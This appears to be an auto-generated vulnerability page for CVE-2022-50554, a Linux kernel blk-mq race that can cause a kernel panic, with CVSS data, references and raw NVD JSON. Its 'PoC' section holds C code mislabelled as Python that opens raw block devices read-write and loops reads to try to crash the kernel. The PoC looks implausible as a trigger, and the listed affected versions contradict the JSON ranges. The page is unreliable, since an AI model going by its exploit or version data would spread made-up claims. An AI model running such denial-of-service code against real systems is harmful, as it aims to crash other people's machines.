CVE-2022-50554

Description

In the Linux kernel, the following vulnerability has been resolved: blk-mq: avoid double ->queue_rq() because of early timeout David Jeffery found one double ->queue_rq() issue, so far it can be triggered in VM use case because of long vmexit latency or preempt latency of vCPU pthread or long page fault in vCPU pthread, then block IO req could be timed out before queuing the request to hardware but after calling blk_mq_start_request() during ->queue_rq(), then timeout handler may handle it by requeue, then double ->queue_rq() is caused, and kernel panic. So far, it is driver's responsibility to cover the race between timeout and completion, so it seems supposed to be solved in driver in theory, given driver has enough knowledge. But it is really one common problem, lots of driver could have similar issue, and could be hard to fix all affected drivers, even it isn't easy for driver to handle the race. So David suggests this patch by draining in-progress ->queue_rq() for solving this issue.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel < 5.15.80

Linux Kernel 5.16.x < 5.16.16

Linux Kernel 5.17.x < 5.17.2

Linux Kernel 5.18.x (开发版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2022-50554 PoC - Triggering double ->queue_rq() in blk-mq
// This PoC demonstrates the race condition that causes kernel panic
// Note: This vulnerability requires VM environment to trigger reliably

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <pthread.h>
#include <errno.h>

// Trigger long page fault or preemption latency in vCPU pthread
// to cause block IO request timeout before queuing to hardware
void* trigger_long_latency(void* arg) {
    // Allocate large memory to cause page faults
    char *buf = (char*)malloc(1024 * 1024 * 1024); // 1GB
    if (!buf) {
        perror("malloc");
        return NULL;
    }
    // Touch pages to cause page faults
    for (size_t i = 0; i < 1024 * 1024 * 1024; i += 4096) {
        buf[i] = 1;
    }
    free(buf);
    return NULL;
}

int main(int argc, char* argv[]) {
    int fd;
    char buf[4096];
    pthread_t tid;
    
    // Create latency-inducing thread
    if (pthread_create(&tid, NULL, trigger_long_latency, NULL) != 0) {
        perror("pthread_create");
        return 1;
    }
    
    // Perform intensive block IO operations
    // to trigger the race condition between timeout and queue_rq
    fd = open("/dev/sda", O_RDWR | O_DIRECT);
    if (fd < 0) {
        // Try other block devices
        fd = open("/dev/vda", O_RDWR | O_DIRECT);
        if (fd < 0) {
            fd = open("/dev/nvme0n1", O_RDWR | O_DIRECT);
        }
    }
    
    if (fd >= 0) {
        // Perform many IO operations to increase chance of triggering race
        for (int i = 0; i < 10000; i++) {
            lseek(fd, i * 4096, SEEK_SET);
            read(fd, buf, sizeof(buf));
        }
        close(fd);
    }
    
    pthread_join(tid, NULL);
    printf("PoC execution completed. Check kernel logs for panic.\n");
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-50554
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-50554
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-50554/
[4] VulDB https://vuldb.com/cve/CVE-2022-50554
[5] https://git.kernel.org/stable/c/7a73c54a3750895888ab586896736c9434e062a1
[6] https://git.kernel.org/stable/c/82c229476b8f6afd7e09bc4dc77d89dc19ff7688
[7] https://git.kernel.org/stable/c/8b3d6b029a552d2978bbac275303d11419826a69

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-50554", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:43.423", "lastModified": "2026-02-06T13:44:50.990", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nblk-mq: avoid double ->queue_rq() because of early timeout\n\nDavid Jeffery found one double ->queue_rq() issue, so far it can\nbe triggered in VM use case because of long vmexit latency or preempt\nlatency of vCPU pthread or long page fault in vCPU pthread, then block\nIO req could be timed out before queuing the request to hardware but after\ncalling blk_mq_start_request() during ->queue_rq(), then timeout handler\nmay handle it by requeue, then double ->queue_rq() is caused, and kernel\npanic.\n\nSo far, it is driver's responsibility to cover the race between timeout\nand completion, so it seems supposed to be solved in driver in theory,\ngiven driver has enough knowledge.\n\nBut it is really one common problem, lots of driver could have similar\nissue, and could be hard to fix all affected drivers, even it isn't easy\nfor driver to handle the race. So David suggests this patch by draining\nin-progress ->queue_rq() for solving this issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.18", "versionEndExcluding": "6.0.16", "matchCriteriaId": "1B81ACB7-1D5E-4680-9ACC-CDB59DA4FD55"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.2", "matchCriteriaId": "77239F4B-6BB2-4B9E-A654-36A52396116C"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/7a73c54a3750895888ab586896736c9434e062a1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/82c229476b8f6afd7e09bc4dc77d89dc19ff7688", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8b3d6b029a552d2978bbac275303d11419826a69", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}